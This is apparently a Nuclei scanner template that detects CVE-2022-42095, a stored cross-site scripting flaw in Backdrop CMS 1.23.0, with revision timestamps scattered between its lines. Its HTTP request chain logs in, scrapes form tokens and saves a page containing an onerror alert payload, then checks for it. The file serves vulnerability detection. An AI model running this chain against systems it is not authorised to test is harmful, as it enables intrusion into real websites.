2023-05-06 12:12:20 +00:00
id : CVE-2022-42095
info :
name : Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author : theamanrawat
severity : medium
description : |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
2023-05-06 12:12:20 +00:00
reference :
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42095
- https://nvd.nist.gov/vuln/detail/CVE-2022-42095
2023-07-11 19:49:27 +00:00
- https://backdropcms.org
2023-05-06 12:12:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score : 4.8
cve-id : CVE-2022-42095
cwe-id : CWE-79
2024-01-14 13:49:27 +00:00
epss-score : 0.00283
epss-percentile : 0.65226
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*
2023-05-06 12:12:20 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 5
2023-07-11 19:49:27 +00:00
vendor : backdropcms
product : backdrop_cms
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,xss,cms,backdrop,authenticated,backdropcms
2023-05-06 12:12:20 +00:00
http :
- raw :
- |
GET /?q=user/login HTTP/1.1
Host : {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/page HTTP/1.1
Host : {{Hostname}}
- |
POST /?q=node/add/page HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save
- |
POST /?q={{randstr}} HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- "status_code_5 == 200"
2023-06-19 21:10:30 +00:00
- "contains(header_5, 'text/html')"
2023-05-06 12:12:20 +00:00
- 'contains(body_5, "<img src=\"x\" onerror=\"alert(document.domain)\" />")'
- "contains(body_5, 'Backdrop CMS')"
condition : and
extractors :
- type : regex
name : form_id_1
group : 1
regex :
- 'name="form_build_id" value="(.*)"'
internal : true
- type : regex
name : form_id_2
group : 1
regex :
- 'name="form_build_id" value="(.*)"'
internal : true
- type : regex
name : form_token
group : 1
regex :
- 'name="form_token" value="(.*)"'
internal : true
2024-01-26 08:31:11 +00:00
# digest: 490a004630440220034fd820495574945439e0f2771b2d730d3e01fc650ba5df79aa66b3e608f66f0220265468d28c9449a6e73199f71f1dc5cbdba0efdb3834a6dc0642156047d88771:922c64590222798bb761d5b6d8e72950